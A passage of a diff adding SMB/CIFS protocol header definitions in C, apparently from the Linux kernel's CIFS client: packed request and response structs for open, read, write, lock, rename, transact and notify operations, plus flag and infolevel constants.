++		__u16 ByteCount;	/* bcc = 0 */
++	} __attribute__((packed)) resp;
++} __attribute__((packed)) TREE_DISCONNECT;
++
++typedef struct smb_com_close_req {
++	struct smb_hdr hdr;	/* wct = 3 */
++	__u16 FileID;
++	__u32 LastWriteTime;	/* should be zero or -1 */
++	__u16 ByteCount;	/* 0 */
++} __attribute__((packed)) CLOSE_REQ;
++
++typedef struct smb_com_close_rsp {
++	struct smb_hdr hdr;	/* wct = 0 */
++	__u16 ByteCount;	/* bct = 0 */
++} __attribute__((packed)) CLOSE_RSP;
++
++typedef struct smb_com_flush_req {
++	struct smb_hdr hdr;	/* wct = 1 */
++	__u16 FileID;
++	__u16 ByteCount;	/* 0 */
++} __attribute__((packed)) FLUSH_REQ;
++
++typedef struct smb_com_findclose_req {
++	struct smb_hdr hdr; /* wct = 1 */
++	__u16 FileID;
++	__u16 ByteCount;    /* 0 */
++} __attribute__((packed)) FINDCLOSE_REQ;
++
++/* OpenFlags */
++#define REQ_MORE_INFO      0x00000001  /* legacy (OPEN_AND_X) only */
++#define REQ_OPLOCK         0x00000002
++#define REQ_BATCHOPLOCK    0x00000004
++#define REQ_OPENDIRONLY    0x00000008
++#define REQ_EXTENDED_INFO  0x00000010
++
++/* File type */
++#define DISK_TYPE		0x0000
++#define BYTE_PIPE_TYPE		0x0001
++#define MESSAGE_PIPE_TYPE	0x0002
++#define PRINTER_TYPE		0x0003
++#define COMM_DEV_TYPE		0x0004
++#define UNKNOWN_TYPE		0xFFFF
++
++/* Device Type or File Status Flags */
++#define NO_EAS			0x0001
++#define NO_SUBSTREAMS		0x0002
++#define NO_REPARSETAG		0x0004
++/* following flags can apply if pipe */
++#define ICOUNT_MASK		0x00FF
++#define PIPE_READ_MODE		0x0100
++#define NAMED_PIPE_TYPE		0x0400
++#define PIPE_END_POINT		0x4000
++#define BLOCKING_NAMED_PIPE	0x8000
++
++typedef struct smb_com_open_req {	/* also handles create */
++	struct smb_hdr hdr;	/* wct = 24 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__u8 Reserved;		/* Must Be Zero */
++	__le16 NameLength;
++	__le32 OpenFlags;
++	__u32  RootDirectoryFid;
++	__le32 DesiredAccess;
++	__le64 AllocationSize;
++	__le32 FileAttributes;
++	__le32 ShareAccess;
++	__le32 CreateDisposition;
++	__le32 CreateOptions;
++	__le32 ImpersonationLevel;
++	__u8 SecurityFlags;
++	__le16 ByteCount;
++	char fileName[1];
++} __attribute__((packed)) OPEN_REQ;
++
++/* open response: oplock levels */
++#define OPLOCK_NONE  	 0
++#define OPLOCK_EXCLUSIVE 1
++#define OPLOCK_BATCH	 2
++#define OPLOCK_READ	 3  /* level 2 oplock */
++
++/* open response for CreateAction shifted left */
++#define CIFS_CREATE_ACTION 0x20000 /* file created */
++
++typedef struct smb_com_open_rsp {
++	struct smb_hdr hdr;	/* wct = 34 BB */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__u8 OplockLevel;
++	__u16 Fid;
++	__le32 CreateAction;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le32 FileAttributes;
++	__le64 AllocationSize;
++	__le64 EndOfFile;
++	__le16 FileType;
++	__le16 DeviceState;
++	__u8 DirectoryFlag;
++	__u16 ByteCount;	/* bct = 0 */
++} __attribute__((packed)) OPEN_RSP;
++
++typedef struct smb_com_open_rsp_ext {
++	struct smb_hdr hdr;     /* wct = 42 but meaningless due to MS bug? */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__u8 OplockLevel;
++	__u16 Fid;
++	__le32 CreateAction;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le32 FileAttributes;
++	__le64 AllocationSize;
++	__le64 EndOfFile;
++	__le16 FileType;
++	__le16 DeviceState;
++	__u8 DirectoryFlag;
++	__u8 VolumeGUID[16];
++	__u64 FileId; /* note no endian conversion - is opaque UniqueID */
++	__le32 MaximalAccessRights;
++	__le32 GuestMaximalAccessRights;
++	__u16 ByteCount;        /* bct = 0 */
++} __attribute__((packed)) OPEN_RSP_EXT;
++
++
++/* format of legacy open request */
++typedef struct smb_com_openx_req {
++	struct smb_hdr	hdr;	/* wct = 15 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__le16 OpenFlags;
++	__le16 Mode;
++	__le16 Sattr; /* search attributes */
++	__le16 FileAttributes;  /* dos attrs */
++	__le32 CreateTime; /* os2 format */
++	__le16 OpenFunction;
++	__le32 EndOfFile;
++	__le32 Timeout;
++	__le32 Reserved;
++	__le16  ByteCount;  /* file name follows */
++	char   fileName[1];
++} __attribute__((packed)) OPENX_REQ;
++
++typedef struct smb_com_openx_rsp {
++	struct smb_hdr	hdr;	/* wct = 15 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__u16  Fid;
++	__le16 FileAttributes;
++	__le32 LastWriteTime; /* os2 format */
++	__le32 EndOfFile;
++	__le16 Access;
++	__le16 FileType;
++	__le16 IPCState;
++	__le16 Action;
++	__u32  FileId;
++	__u16  Reserved;
++	__u16  ByteCount;
++} __attribute__((packed)) OPENX_RSP;
++
++/* For encoding of POSIX Open Request - see trans2 function 0x209 data struct */
++
++/* Legacy write request for older servers */
++typedef struct smb_com_writex_req {
++	struct smb_hdr hdr;     /* wct = 12 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__u16 Fid;
++	__le32 OffsetLow;
++	__u32 Reserved; /* Timeout */
++	__le16 WriteMode; /* 1 = write through */
++	__le16 Remaining;
++	__le16 Reserved2;
++	__le16 DataLengthLow;
++	__le16 DataOffset;
++	__le16 ByteCount;
++	__u8 Pad;		/* BB check for whether padded to DWORD
++				   boundary and optimum performance here */
++	char Data[];
++} __attribute__((packed)) WRITEX_REQ;
++
++typedef struct smb_com_write_req {
++	struct smb_hdr hdr;	/* wct = 14 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__u16 Fid;
++	__le32 OffsetLow;
++	__u32 Reserved;
++	__le16 WriteMode;
++	__le16 Remaining;
++	__le16 DataLengthHigh;
++	__le16 DataLengthLow;
++	__le16 DataOffset;
++	__le32 OffsetHigh;
++	__le16 ByteCount;
++	__u8 Pad;		/* BB check for whether padded to DWORD
++				   boundary and optimum performance here */
++	char Data[];
++} __attribute__((packed)) WRITE_REQ;
++
++typedef struct smb_com_write_rsp {
++	struct smb_hdr hdr;	/* wct = 6 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__le16 Count;
++	__le16 Remaining;
++	__le16 CountHigh;
++	__u16  Reserved;
++	__u16 ByteCount;
++} __attribute__((packed)) WRITE_RSP;
++
++/* legacy read request for older servers */
++typedef struct smb_com_readx_req {
++	struct smb_hdr hdr;	/* wct = 10 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__u16 Fid;
++	__le32 OffsetLow;
++	__le16 MaxCount;
++	__le16 MinCount;	/* obsolete */
++	__le32 Reserved;
++	__le16 Remaining;
++	__le16 ByteCount;
++} __attribute__((packed)) READX_REQ;
++
++typedef struct smb_com_read_req {
++	struct smb_hdr hdr;	/* wct = 12 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__u16 Fid;
++	__le32 OffsetLow;
++	__le16 MaxCount;
++	__le16 MinCount;		/* obsolete */
++	__le32 MaxCountHigh;
++	__le16 Remaining;
++	__le32 OffsetHigh;
++	__le16 ByteCount;
++} __attribute__((packed)) READ_REQ;
++
++typedef struct smb_com_read_rsp {
++	struct smb_hdr hdr;	/* wct = 12 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__le16 Remaining;
++	__le16 DataCompactionMode;
++	__le16 Reserved;
++	__le16 DataLength;
++	__le16 DataOffset;
++	__le16 DataLengthHigh;
++	__u64 Reserved2;
++	__u16 ByteCount;
++	/* read response data immediately follows */
++} __attribute__((packed)) READ_RSP;
++
++typedef struct locking_andx_range {
++	__le16 Pid;
++	__le16 Pad;
++	__le32 OffsetHigh;
++	__le32 OffsetLow;
++	__le32 LengthHigh;
++	__le32 LengthLow;
++} __attribute__((packed)) LOCKING_ANDX_RANGE;
++
++#define LOCKING_ANDX_SHARED_LOCK     0x01
++#define LOCKING_ANDX_OPLOCK_RELEASE  0x02
++#define LOCKING_ANDX_CHANGE_LOCKTYPE 0x04
++#define LOCKING_ANDX_CANCEL_LOCK     0x08
++#define LOCKING_ANDX_LARGE_FILES     0x10	/* always on for us */
++
++typedef struct smb_com_lock_req {
++	struct smb_hdr hdr;	/* wct = 8 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__u16 Fid;
++	__u8 LockType;
++	__u8 OplockLevel;
++	__le32 Timeout;
++	__le16 NumberOfUnlocks;
++	__le16 NumberOfLocks;
++	__le16 ByteCount;
++	LOCKING_ANDX_RANGE Locks[1];
++} __attribute__((packed)) LOCK_REQ;
++
++/* lock type */
++#define CIFS_RDLCK	0
++#define CIFS_WRLCK	1
++#define CIFS_UNLCK      2
++typedef struct cifs_posix_lock {
++	__le16  lock_type;  /* 0 = Read, 1 = Write, 2 = Unlock */
++	__le16  lock_flags; /* 1 = Wait (only valid for setlock) */
++	__le32  pid;
++	__le64	start;
++	__le64	length;
++	/* BB what about additional owner info to identify network client */
++} __attribute__((packed)) CIFS_POSIX_LOCK;
++
++typedef struct smb_com_lock_rsp {
++	struct smb_hdr hdr;	/* wct = 2 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__u16 ByteCount;
++} __attribute__((packed)) LOCK_RSP;
++
++typedef struct smb_com_rename_req {
++	struct smb_hdr hdr;	/* wct = 1 */
++	__le16 SearchAttributes;	/* target file attributes */
++	__le16 ByteCount;
++	__u8 BufferFormat;	/* 4 = ASCII or Unicode */
++	unsigned char OldFileName[1];
++	/* followed by __u8 BufferFormat2 */
++	/* followed by NewFileName */
++} __attribute__((packed)) RENAME_REQ;
++
++	/* copy request flags */
++#define COPY_MUST_BE_FILE      0x0001
++#define COPY_MUST_BE_DIR       0x0002
++#define COPY_TARGET_MODE_ASCII 0x0004 /* if not set, binary */
++#define COPY_SOURCE_MODE_ASCII 0x0008 /* if not set, binary */
++#define COPY_VERIFY_WRITES     0x0010
++#define COPY_TREE              0x0020
++
++typedef struct smb_com_copy_req {
++	struct smb_hdr hdr;	/* wct = 3 */
++	__u16 Tid2;
++	__le16 OpenFunction;
++	__le16 Flags;
++	__le16 ByteCount;
++	__u8 BufferFormat;	/* 4 = ASCII or Unicode */
++	unsigned char OldFileName[1];
++	/* followed by __u8 BufferFormat2 */
++	/* followed by NewFileName string */
++} __attribute__((packed)) COPY_REQ;
++
++typedef struct smb_com_copy_rsp {
++	struct smb_hdr hdr;     /* wct = 1 */
++	__le16 CopyCount;    /* number of files copied */
++	__u16 ByteCount;    /* may be zero */
++	__u8 BufferFormat;  /* 0x04 - only present if errored file follows */
++	unsigned char ErrorFileName[1]; /* only present if error in copy */
++} __attribute__((packed)) COPY_RSP;
++
++#define CREATE_HARD_LINK		0x103
++#define MOVEFILE_COPY_ALLOWED		0x0002
++#define MOVEFILE_REPLACE_EXISTING	0x0001
++
++typedef struct smb_com_nt_rename_req {	/* A5 - also used for create hardlink */
++	struct smb_hdr hdr;	/* wct = 4 */
++	__le16 SearchAttributes;	/* target file attributes */
++	__le16 Flags;		/* spec says Information Level */
++	__le32 ClusterCount;
++	__le16 ByteCount;
++	__u8 BufferFormat;	/* 4 = ASCII or Unicode */
++	unsigned char OldFileName[1];
++	/* followed by __u8 BufferFormat2 */
++	/* followed by NewFileName */
++} __attribute__((packed)) NT_RENAME_REQ;
++
++typedef struct smb_com_rename_rsp {
++	struct smb_hdr hdr;	/* wct = 0 */
++	__u16 ByteCount;	/* bct = 0 */
++} __attribute__((packed)) RENAME_RSP;
++
++typedef struct smb_com_delete_file_req {
++	struct smb_hdr hdr;	/* wct = 1 */
++	__le16 SearchAttributes;
++	__le16 ByteCount;
++	__u8 BufferFormat;	/* 4 = ASCII */
++	unsigned char fileName[1];
++} __attribute__((packed)) DELETE_FILE_REQ;
++
++typedef struct smb_com_delete_file_rsp {
++	struct smb_hdr hdr;	/* wct = 0 */
++	__u16 ByteCount;	/* bct = 0 */
++} __attribute__((packed)) DELETE_FILE_RSP;
++
++typedef struct smb_com_delete_directory_req {
++	struct smb_hdr hdr;	/* wct = 0 */
++	__le16 ByteCount;
++	__u8 BufferFormat;	/* 4 = ASCII */
++	unsigned char DirName[1];
++} __attribute__((packed)) DELETE_DIRECTORY_REQ;
++
++typedef struct smb_com_delete_directory_rsp {
++	struct smb_hdr hdr;	/* wct = 0 */
++	__u16 ByteCount;	/* bct = 0 */
++} __attribute__((packed)) DELETE_DIRECTORY_RSP;
++
++typedef struct smb_com_create_directory_req {
++	struct smb_hdr hdr;	/* wct = 0 */
++	__le16 ByteCount;
++	__u8 BufferFormat;	/* 4 = ASCII */
++	unsigned char DirName[1];
++} __attribute__((packed)) CREATE_DIRECTORY_REQ;
++
++typedef struct smb_com_create_directory_rsp {
++	struct smb_hdr hdr;	/* wct = 0 */
++	__u16 ByteCount;	/* bct = 0 */
++} __attribute__((packed)) CREATE_DIRECTORY_RSP;
++
++typedef struct smb_com_query_information_req {
++	struct smb_hdr hdr;     /* wct = 0 */
++	__le16 ByteCount;	/* 1 + namelen + 1 */
++	__u8 BufferFormat;      /* 4 = ASCII */
++	unsigned char FileName[1];
++} __attribute__((packed)) QUERY_INFORMATION_REQ;
++
++typedef struct smb_com_query_information_rsp {
++	struct smb_hdr hdr;     /* wct = 10 */
++	__le16 attr;
++	__le32  last_write_time;
++	__le32 size;
++	__u16  reserved[5];
++	__le16 ByteCount;	/* bcc = 0 */
++} __attribute__((packed)) QUERY_INFORMATION_RSP;
++
++typedef struct smb_com_setattr_req {
++	struct smb_hdr hdr; /* wct = 8 */
++	__le16 attr;
++	__le16 time_low;
++	__le16 time_high;
++	__le16 reserved[5]; /* must be zero */
++	__u16  ByteCount;
++	__u8   BufferFormat; /* 4 = ASCII */
++	unsigned char fileName[1];
++} __attribute__((packed)) SETATTR_REQ;
++
++typedef struct smb_com_setattr_rsp {
++	struct smb_hdr hdr;     /* wct = 0 */
++	__u16 ByteCount;        /* bct = 0 */
++} __attribute__((packed)) SETATTR_RSP;
++
++/* empty wct response to setattr */
++
++/*******************************************************/
++/* NT Transact structure definitions follow            */
++/* Currently only ioctl, acl (get security descriptor) */
++/* and notify are implemented                          */
++/*******************************************************/
++typedef struct smb_com_ntransact_req {
++	struct smb_hdr hdr; /* wct >= 19 */
++	__u8 MaxSetupCount;
++	__u16 Reserved;
++	__le32 TotalParameterCount;
++	__le32 TotalDataCount;
++	__le32 MaxParameterCount;
++	__le32 MaxDataCount;
++	__le32 ParameterCount;
++	__le32 ParameterOffset;
++	__le32 DataCount;
++	__le32 DataOffset;
++	__u8 SetupCount; /* four setup words follow subcommand */
++	/* SNIA spec incorrectly included spurious pad here */
++	__le16 SubCommand; /* 2 = IOCTL/FSCTL */
++	/* SetupCount words follow then */
++	__le16 ByteCount;
++	__u8 Pad[3];
++	__u8 Parms[];
++} __attribute__((packed)) NTRANSACT_REQ;
++
++typedef struct smb_com_ntransact_rsp {
++	struct smb_hdr hdr;     /* wct = 18 */
++	__u8 Reserved[3];
++	__le32 TotalParameterCount;
++	__le32 TotalDataCount;
++	__le32 ParameterCount;
++	__le32 ParameterOffset;
++	__le32 ParameterDisplacement;
++	__le32 DataCount;
++	__le32 DataOffset;
++	__le32 DataDisplacement;
++	__u8 SetupCount;   /* 0 */
++	__u16 ByteCount;
++	/* __u8 Pad[3]; */
++	/* parms and data follow */
++} __attribute__((packed)) NTRANSACT_RSP;
++
++/* See MS-SMB 2.2.7.2.1.1 */
++struct srv_copychunk {
++	__le64 SourceOffset;
++	__le64 DestinationOffset;
++	__le32 CopyLength;
++	__u32  Reserved;
++} __packed;
++
++typedef struct smb_com_transaction_ioctl_req {
++	struct smb_hdr hdr;	/* wct = 23 */
++	__u8 MaxSetupCount;
++	__u16 Reserved;
++	__le32 TotalParameterCount;
++	__le32 TotalDataCount;
++	__le32 MaxParameterCount;
++	__le32 MaxDataCount;
++	__le32 ParameterCount;
++	__le32 ParameterOffset;
++	__le32 DataCount;
++	__le32 DataOffset;
++	__u8 SetupCount; /* four setup words follow subcommand */
++	/* SNIA spec incorrectly included spurious pad here */
++	__le16 SubCommand; /* 2 = IOCTL/FSCTL */
++	__le32 FunctionCode;
++	__u16 Fid;
++	__u8 IsFsctl;  /* 1 = File System Control 0 = device control (IOCTL) */
++	__u8 IsRootFlag; /* 1 = apply command to root of share (must be DFS) */
++	__le16 ByteCount;
++	__u8 Pad[3];
++	__u8 Data[1];
++} __attribute__((packed)) TRANSACT_IOCTL_REQ;
++
++typedef struct smb_com_transaction_compr_ioctl_req {
++	struct smb_hdr hdr;	/* wct = 23 */
++	__u8 MaxSetupCount;
++	__u16 Reserved;
++	__le32 TotalParameterCount;
++	__le32 TotalDataCount;
++	__le32 MaxParameterCount;
++	__le32 MaxDataCount;
++	__le32 ParameterCount;
++	__le32 ParameterOffset;
++	__le32 DataCount;
++	__le32 DataOffset;
++	__u8 SetupCount; /* four setup words follow subcommand */
++	/* SNIA spec incorrectly included spurious pad here */
++	__le16 SubCommand; /* 2 = IOCTL/FSCTL */
++	__le32 FunctionCode;
++	__u16 Fid;
++	__u8 IsFsctl;  /* 1 = File System Control 0 = device control (IOCTL) */
++	__u8 IsRootFlag; /* 1 = apply command to root of share (must be DFS) */
++	__le16 ByteCount;
++	__u8 Pad[3];
++	__le16 compression_state;  /* See below for valid flags */
++} __attribute__((packed)) TRANSACT_COMPR_IOCTL_REQ;
++
++/* compression state flags */
++#define COMPRESSION_FORMAT_NONE		0x0000
++#define COMPRESSION_FORMAT_DEFAULT	0x0001
++#define COMPRESSION_FORMAT_LZNT1	0x0002
++
++typedef struct smb_com_transaction_ioctl_rsp {
++	struct smb_hdr hdr;	/* wct = 19 */
++	__u8 Reserved[3];
++	__le32 TotalParameterCount;
++	__le32 TotalDataCount;
++	__le32 ParameterCount;
++	__le32 ParameterOffset;
++	__le32 ParameterDisplacement;
++	__le32 DataCount;
++	__le32 DataOffset;
++	__le32 DataDisplacement;
++	__u8 SetupCount;	/* 1 */
++	__le16 ReturnedDataLen;
++	__u16 ByteCount;
++} __attribute__((packed)) TRANSACT_IOCTL_RSP;
++
++#define CIFS_ACL_OWNER 1
++#define CIFS_ACL_GROUP 2
++#define CIFS_ACL_DACL  4
++#define CIFS_ACL_SACL  8
++
++typedef struct smb_com_transaction_qsec_req {
++	struct smb_hdr hdr;     /* wct = 19 */
++	__u8 MaxSetupCount;
++	__u16 Reserved;
++	__le32 TotalParameterCount;
++	__le32 TotalDataCount;
++	__le32 MaxParameterCount;
++	__le32 MaxDataCount;
++	__le32 ParameterCount;
++	__le32 ParameterOffset;
++	__le32 DataCount;
++	__le32 DataOffset;
++	__u8 SetupCount; /* no setup words follow subcommand */
++	/* SNIA spec incorrectly included spurious pad here */
++	__le16 SubCommand; /* 6 = QUERY_SECURITY_DESC */
++	__le16 ByteCount; /* bcc = 3 + 8 */
++	__u8 Pad[3];
++	__u16 Fid;
++	__u16 Reserved2;
++	__le32 AclFlags;
++} __attribute__((packed)) QUERY_SEC_DESC_REQ;
++
++
++typedef struct smb_com_transaction_ssec_req {
++	struct smb_hdr hdr;     /* wct = 19 */
++	__u8 MaxSetupCount;
++	__u16 Reserved;
++	__le32 TotalParameterCount;
++	__le32 TotalDataCount;
++	__le32 MaxParameterCount;
++	__le32 MaxDataCount;
++	__le32 ParameterCount;
++	__le32 ParameterOffset;
++	__le32 DataCount;
++	__le32 DataOffset;
++	__u8 SetupCount; /* no setup words follow subcommand */
++	/* SNIA spec incorrectly included spurious pad here */
++	__le16 SubCommand; /* 3 = SET_SECURITY_DESC */
++	__le16 ByteCount; /* bcc = 3 + 8 */
++	__u8 Pad[3];
++	__u16 Fid;
++	__u16 Reserved2;
++	__le32 AclFlags;
++} __attribute__((packed)) SET_SEC_DESC_REQ;
++
++typedef struct smb_com_transaction_change_notify_req {
++	struct smb_hdr hdr;     /* wct = 23 */
++	__u8 MaxSetupCount;
++	__u16 Reserved;
++	__le32 TotalParameterCount;
++	__le32 TotalDataCount;
++	__le32 MaxParameterCount;
++	__le32 MaxDataCount;
++	__le32 ParameterCount;
++	__le32 ParameterOffset;
++	__le32 DataCount;
++	__le32 DataOffset;
++	__u8 SetupCount; /* four setup words follow subcommand */
++	/* SNIA spec incorrectly included spurious pad here */
++	__le16 SubCommand;/* 4 = Change Notify */
++	__le32 CompletionFilter;  /* operation to monitor */
++	__u16 Fid;
++	__u8 WatchTree;  /* 1 = Monitor subdirectories */
++	__u8 Reserved2;
++	__le16 ByteCount;
++/* 	__u8 Pad[3];*/
++/*	__u8 Data[1];*/
++} __attribute__((packed)) TRANSACT_CHANGE_NOTIFY_REQ;
++
++/* BB eventually change to use generic ntransact rsp struct
++      and validation routine */
++typedef struct smb_com_transaction_change_notify_rsp {
++	struct smb_hdr hdr;	/* wct = 18 */
++	__u8 Reserved[3];
++	__le32 TotalParameterCount;
++	__le32 TotalDataCount;
++	__le32 ParameterCount;
++	__le32 ParameterOffset;
++	__le32 ParameterDisplacement;
++	__le32 DataCount;
++	__le32 DataOffset;
++	__le32 DataDisplacement;
++	__u8 SetupCount;   /* 0 */
++	__u16 ByteCount;
++	/* __u8 Pad[3]; */
++} __attribute__((packed)) TRANSACT_CHANGE_NOTIFY_RSP;
++/* Completion Filter flags for Notify */
++#define FILE_NOTIFY_CHANGE_FILE_NAME    0x00000001
++#define FILE_NOTIFY_CHANGE_DIR_NAME     0x00000002
++#define FILE_NOTIFY_CHANGE_NAME         0x00000003
++#define FILE_NOTIFY_CHANGE_ATTRIBUTES   0x00000004
++#define FILE_NOTIFY_CHANGE_SIZE         0x00000008
++#define FILE_NOTIFY_CHANGE_LAST_WRITE   0x00000010
++#define FILE_NOTIFY_CHANGE_LAST_ACCESS  0x00000020
++#define FILE_NOTIFY_CHANGE_CREATION     0x00000040
++#define FILE_NOTIFY_CHANGE_EA           0x00000080
++#define FILE_NOTIFY_CHANGE_SECURITY     0x00000100
++#define FILE_NOTIFY_CHANGE_STREAM_NAME  0x00000200
++#define FILE_NOTIFY_CHANGE_STREAM_SIZE  0x00000400
++#define FILE_NOTIFY_CHANGE_STREAM_WRITE 0x00000800
++
++#define FILE_ACTION_ADDED		0x00000001
++#define FILE_ACTION_REMOVED		0x00000002
++#define FILE_ACTION_MODIFIED		0x00000003
++#define FILE_ACTION_RENAMED_OLD_NAME	0x00000004
++#define FILE_ACTION_RENAMED_NEW_NAME	0x00000005
++#define FILE_ACTION_ADDED_STREAM	0x00000006
++#define FILE_ACTION_REMOVED_STREAM	0x00000007
++#define FILE_ACTION_MODIFIED_STREAM	0x00000008
++
++/* response contains array of the following structures */
++struct file_notify_information {
++	__le32 NextEntryOffset;
++	__le32 Action;
++	__le32 FileNameLength;
++	__u8  FileName[];
++} __attribute__((packed));
++
++/* For IO_REPARSE_TAG_SYMLINK */
++struct reparse_symlink_data {
++	__le32	ReparseTag;
++	__le16	ReparseDataLength;
++	__u16	Reserved;
++	__le16	SubstituteNameOffset;
++	__le16	SubstituteNameLength;
++	__le16	PrintNameOffset;
++	__le16	PrintNameLength;
++	__le32	Flags;
++	char	PathBuffer[];
++} __attribute__((packed));
++
++/* Flag above */
++#define SYMLINK_FLAG_RELATIVE 0x00000001
++
++/* For IO_REPARSE_TAG_NFS */
++#define NFS_SPECFILE_LNK	0x00000000014B4E4C
++#define NFS_SPECFILE_CHR	0x0000000000524843
++#define NFS_SPECFILE_BLK	0x00000000004B4C42
++#define NFS_SPECFILE_FIFO	0x000000004F464946
++#define NFS_SPECFILE_SOCK	0x000000004B434F53
++struct reparse_posix_data {
++	__le32	ReparseTag;
++	__le16	ReparseDataLength;
++	__u16	Reserved;
++	__le64	InodeType; /* LNK, FIFO, CHR etc. */
++	char	PathBuffer[];
++} __attribute__((packed));
++
++struct cifs_quota_data {
++	__u32	rsrvd1;  /* 0 */
++	__u32	sid_size;
++	__u64	rsrvd2;  /* 0 */
++	__u64	space_used;
++	__u64	soft_limit;
++	__u64	hard_limit;
++	char	sid[1];  /* variable size? */
++} __attribute__((packed));
++
++/* quota sub commands */
++#define QUOTA_LIST_CONTINUE	    0
++#define QUOTA_LIST_START	0x100
++#define QUOTA_FOR_SID		0x101
++
++struct trans2_req {
++	/* struct smb_hdr hdr precedes. Set wct = 14+ */
++	__le16 TotalParameterCount;
++	__le16 TotalDataCount;
++	__le16 MaxParameterCount;
++	__le16 MaxDataCount;
++	__u8 MaxSetupCount;
++	__u8 Reserved;
++	__le16 Flags;
++	__le32 Timeout;
++	__u16 Reserved2;
++	__le16 ParameterCount;
++	__le16 ParameterOffset;
++	__le16 DataCount;
++	__le16 DataOffset;
++	__u8 SetupCount;
++	__u8 Reserved3;
++	__le16 SubCommand; /* 1st setup word - SetupCount words follow */
++	__le16 ByteCount;
++} __attribute__((packed));
++
++struct smb_t2_req {
++	struct smb_hdr hdr;
++	struct trans2_req t2_req;
++} __attribute__((packed));
++
++struct trans2_resp {
++	/* struct smb_hdr hdr precedes. Note wct = 10 + setup count */
++	__le16 TotalParameterCount;
++	__le16 TotalDataCount;
++	__u16 Reserved;
++	__le16 ParameterCount;
++	__le16 ParameterOffset;
++	__le16 ParameterDisplacement;
++	__le16 DataCount;
++	__le16 DataOffset;
++	__le16 DataDisplacement;
++	__u8 SetupCount;
++	__u8 Reserved1;
++	/* SetupWords[SetupCount];
++	__u16 ByteCount;
++	__u16 Reserved2;*/
++	/* data area follows */
++} __attribute__((packed));
++
++struct smb_t2_rsp {
++	struct smb_hdr hdr;
++	struct trans2_resp t2_rsp;
++} __attribute__((packed));
++
++/* PathInfo/FileInfo infolevels */
++#define SMB_INFO_STANDARD                   1
++#define SMB_SET_FILE_EA                     2
++#define SMB_QUERY_FILE_EA_SIZE              2
++#define SMB_INFO_QUERY_EAS_FROM_LIST        3
++#define SMB_INFO_QUERY_ALL_EAS              4
++#define SMB_INFO_IS_NAME_VALID              6
++#define SMB_QUERY_FILE_BASIC_INFO       0x101
++#define SMB_QUERY_FILE_STANDARD_INFO    0x102
++#define SMB_QUERY_FILE_EA_INFO          0x103
++#define SMB_QUERY_FILE_NAME_INFO        0x104
++#define SMB_QUERY_FILE_ALLOCATION_INFO  0x105
++#define SMB_QUERY_FILE_END_OF_FILEINFO  0x106
++#define SMB_QUERY_FILE_ALL_INFO         0x107
++#define SMB_QUERY_ALT_NAME_INFO         0x108
++#define SMB_QUERY_FILE_STREAM_INFO      0x109
++#define SMB_QUERY_FILE_COMPRESSION_INFO 0x10B
++#define SMB_QUERY_FILE_UNIX_BASIC       0x200
++#define SMB_QUERY_FILE_UNIX_LINK        0x201
++#define SMB_QUERY_POSIX_ACL             0x204
++#define SMB_QUERY_XATTR                 0x205  /* e.g. system EA name space */
++#define SMB_QUERY_ATTR_FLAGS            0x206  /* append,immutable etc. */
++#define SMB_QUERY_POSIX_PERMISSION      0x207
++#define SMB_QUERY_POSIX_LOCK            0x208
++/* #define SMB_POSIX_OPEN               0x209 */
++/* #define SMB_POSIX_UNLINK             0x20a */
++#define SMB_QUERY_FILE__UNIX_INFO2      0x20b
++#define SMB_QUERY_FILE_INTERNAL_INFO    0x3ee
++#define SMB_QUERY_FILE_ACCESS_INFO      0x3f0
++#define SMB_QUERY_FILE_NAME_INFO2       0x3f1 /* 0x30 bytes */
++#define SMB_QUERY_FILE_POSITION_INFO    0x3f6
++#define SMB_QUERY_FILE_MODE_INFO        0x3f8
++#define SMB_QUERY_FILE_ALGN_INFO        0x3f9
++
++
++#define SMB_SET_FILE_BASIC_INFO	        0x101
++#define SMB_SET_FILE_DISPOSITION_INFO   0x102
++#define SMB_SET_FILE_ALLOCATION_INFO    0x103
++#define SMB_SET_FILE_END_OF_FILE_INFO   0x104
++#define SMB_SET_FILE_UNIX_BASIC         0x200
++#define SMB_SET_FILE_UNIX_LINK          0x201
++#define SMB_SET_FILE_UNIX_HLINK         0x203
++#define SMB_SET_POSIX_ACL               0x204
++#define SMB_SET_XATTR                   0x205
++#define SMB_SET_ATTR_FLAGS              0x206  /* append, immutable etc. */
++#define SMB_SET_POSIX_LOCK              0x208
++#define SMB_POSIX_OPEN                  0x209
++#define SMB_POSIX_UNLINK                0x20a
++#define SMB_SET_FILE_UNIX_INFO2         0x20b
++#define SMB_SET_FILE_BASIC_INFO2        0x3ec
++#define SMB_SET_FILE_RENAME_INFORMATION 0x3f2 /* BB check if qpathinfo too */
++#define SMB_FILE_ALL_INFO2              0x3fa
++#define SMB_SET_FILE_ALLOCATION_INFO2   0x3fb
++#define SMB_SET_FILE_END_OF_FILE_INFO2  0x3fc
++#define SMB_FILE_MOVE_CLUSTER_INFO      0x407
++#define SMB_FILE_QUOTA_INFO             0x408
++#define SMB_FILE_REPARSEPOINT_INFO      0x409
++#define SMB_FILE_MAXIMUM_INFO           0x40d
++
++/* Find File infolevels */
++#define SMB_FIND_FILE_INFO_STANDARD       0x001
++#define SMB_FIND_FILE_QUERY_EA_SIZE       0x002
++#define SMB_FIND_FILE_QUERY_EAS_FROM_LIST 0x003
++#define SMB_FIND_FILE_DIRECTORY_INFO      0x101
